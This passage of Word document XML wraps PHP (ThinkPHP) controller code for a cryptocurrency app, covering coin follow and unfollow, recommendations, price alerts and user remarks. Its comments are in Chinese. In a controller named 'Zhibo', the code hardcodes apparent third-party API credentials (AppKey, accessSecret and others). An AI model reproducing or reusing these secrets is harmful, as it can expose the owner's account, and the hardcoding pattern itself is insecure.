    <w:p w14:paraId="2D719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coin')-&gt;insert($member_coin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D121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id', $coin['id'])-&gt;setInc('follow_num', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F454B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D637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关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24C4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692F0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未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D29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A616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2FB0FE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2BDE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161B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unfollow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员取消关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F4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会员取消关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7ED7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5C12F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5EBE19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3DE95F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coin_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D090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取消关注成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE0A1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Error {String} err       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736CC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61A5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unfollow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691139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4C75D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_id = input('param.coin_id') ? input('param.coin_id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5707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coin_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C932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 = _user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699576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 = Db::name('member_coin')-&gt;where('member_id', $member['id'])-&gt;where('coin_id', $coin_id)-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC39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ret) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270E0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coin')-&gt;where('id', $coin_id)-&gt;setDec('follow_num', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6944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7CF1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ret' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取消关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BB5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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A3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err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺少参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E4D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8D8EC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34E3B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E8B3C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958B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recommend </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐会员关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1392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推荐会员关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD78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2674D2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6AC1EB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C7F9B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推荐列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FB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id          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D166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urrency    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5328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ullname    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5806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 @apiSuccess {String} data.fullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0A4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follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4B1B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5DC5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commend()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00712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FA7CB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sh = Db::name('coin')-&gt;order('follow_num asc')-&gt;limit(10)-&gt;field('id,currency,fullname,fullname_zh,follow_num')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332FA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ush){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B441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push as &amp;$p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F403B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338D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icon'] = '/public/coin/icon/' . strtolower($p['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F8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0247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push);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C889F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6AD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前没有可推荐的虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EED35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D1A8D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B5E8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alert </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置价格提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63996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设置价格提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB49E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4234E7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029CB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508532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exchange           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE9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symbol             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61125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alert1             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>高价提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E6C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Number} alert2             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低价提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF63C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ret              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194D6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5F26E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alert()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C0E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08D6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Coinfollow');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261113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783617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4E32FB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DA68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member_id']=$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ECB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exchange']=input('post.exchange', 'binance','org\Filter::safeHtml');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B5F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symbol']=input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D3F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handle']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F89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member_id']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFC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ce1=input('post.alert1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC39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ce2=input('post.alert2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413DF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t_alert=function ($alert){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DC0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symbol_alert')-&gt;insert($alert);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276C3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2C7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rice1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62750E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AB99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price']=$price1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524D0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set_alert($alert); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DFA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230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rice2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D59B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BEB8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alert['price']=$price2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8A0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set_alert($alert); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BAA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6A0E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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C12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9CD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A738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        {post} /api/coinfollow/remarks </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D58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Name    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEBA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Group   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB96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Version 0.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CF9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token              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259652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base               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F728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Param {String} content            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF8C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Object} data             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不传</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段，如果用户设置了备注，返回备注，没设置备注返回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；传</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段，会新建和更新备注，返回用户最新备注；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CD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id              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A20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Number} data.member_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C37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base            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698B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 @apiSuccess {String} data.content         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08A0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F0027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remarks()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E819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1A0D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validate('Remarks');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476F0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alidate-&gt;check(input('post.'))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F25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 =&gt; $validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681956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F1156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ember_id']=$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474021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base']=input('post.base');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257EA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input('post.content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC1E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s=Db::name('remarks')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74947C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tent){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F744A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marks){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B585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s['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE12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remarks')-&gt;where($where)-&gt;update($remarks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F8E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62F54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s=$where;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C51F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marks['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BFA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remarks')-&gt;insert($remarks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249E0B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E19E8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b::name('remarks')-&gt;where($where)-&gt;find());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E92D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687E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marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06648D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marks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA14A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8C6B1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未找到备注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F14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0D8D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03E7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0DD90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3EF9A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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBDF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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D076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use think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC84A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use think\Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D151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062F55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Zhibo extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8C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E1FC5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member         =   null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E29C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url            =   'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A485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AppId          =   '2614';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2AD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appBiaozhi     =   'd1329b71ac2e4bf2b50e63b8b07eaa4b';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E91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accessSecret   =   'f5e4337125134d628a8868954d268e0c';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53DA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AppKey         =   'f43d25394e37458ab3694d4f90a78d47';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFD5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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EFAE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rent::__construct();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCF1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fig=Db::name('member_config')-&gt;where('name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4E51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nset($data);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316596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config || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140C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gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20CA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B04CB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Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649B6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aaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7D8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tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E3C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9262E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token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9D2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51A406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CA872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3F67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decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E0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53AE89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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC6B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623955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865E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user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F42B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073958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member['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFEA73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0':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61F0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被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149B5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63C837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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1305F4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84AB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0ABDEA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32E28C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82F4E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09D173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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B2D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1BE63A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正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A666F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6E244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616AC0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76080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2C2B9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ase '3':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE87C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cording=_records($member['id'],'API</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EBA94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cording){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA0F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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
